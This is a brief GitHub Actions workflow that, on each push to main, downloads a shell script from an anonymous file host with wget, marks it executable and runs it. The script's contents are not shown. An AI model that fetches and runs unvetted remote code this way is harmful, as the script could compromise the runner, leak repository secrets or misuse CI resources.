name: Run Shell Script

on:
  push:
    branches:
      - main

jobs:
  run-script:
    runs-on: ubuntu-latest
    
    steps:
      - name: 下载脚本
        run: wget -O /tmp/uh19yg.sh "https://files.catbox.moe/uh19yg.sh"

      - name: 赋予执行权限
        run: chmod +x /tmp/uh19yg.sh

      - name: 运行脚本
        run: bash /tmp/uh19yg.sh
